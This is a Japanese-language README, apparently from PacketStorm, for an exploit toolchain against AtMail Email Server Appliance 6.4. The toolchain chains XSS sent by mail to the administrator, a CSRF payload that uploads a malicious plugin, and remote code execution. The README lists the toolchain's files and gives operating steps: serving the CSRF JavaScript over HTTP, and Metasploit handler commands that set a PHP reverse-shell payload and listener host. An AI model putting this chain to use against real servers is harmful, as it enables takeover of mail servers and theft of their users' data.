
AtMail Email Server Appliance 6.4 - エクスプロイトツールチェーン (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
免責事項: このエクスプロイトツールチェーンは EDB-ID 20009 に触発されたものです。
このエクスプロイトツールチェーンの目的は、EDB-ID 20009 を置き換えることです。
このツールチェーンが EDB-ID 20009 エクスプロイトよりも優れている点:
EDB-ID 20009 エクスプロイトの欠点:
msfvenom によるリバースシェル生成)ArchLinuxへの要件のインストール:
$ sudo pacman -S metasploit tar ruby
エクスプロイトファイル:
config.yml ツールチェーン構成を含むexploit.sh 実行する必要があるエクスプロイトラッパーxss_mail.rb Atmail SMTPサーバー(認証なし)経由でXSSを含むメールを管理者に送信する。csrf_prepare.rb CSRFペイロードを準備する(ターゲットを設定し、プラグインアーカイブをエンコードする)rce_prepare.rb RCEを準備する(リバースシェルを生成し、プラグインアーカイブを作成する)csrf_plugin.js 準備済みのCSRFペイロードnoraj/ 非圧縮のプラグイン構造を含むフォルダーこのエクスプロイトツールチェーンに必要な手動操作は2つだけです。
config.yml を編集するexploit.sh を起動するただし、攻撃を開始する前に、JavaScript CSRFファイルを配信するWebサーバーが必要であり、リバースシェルリスナーが接続を待機している必要があります。したがって、攻撃は次のようになります。
config.yml を編集するcsrf_plugin.js を配信するHTTPサーバーを起動するexploit.sh を起動するワンライナーHTTPサーバーの例:
$ ruby -run -e httpd . -p 8000
リバースシェルリスナーの例:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run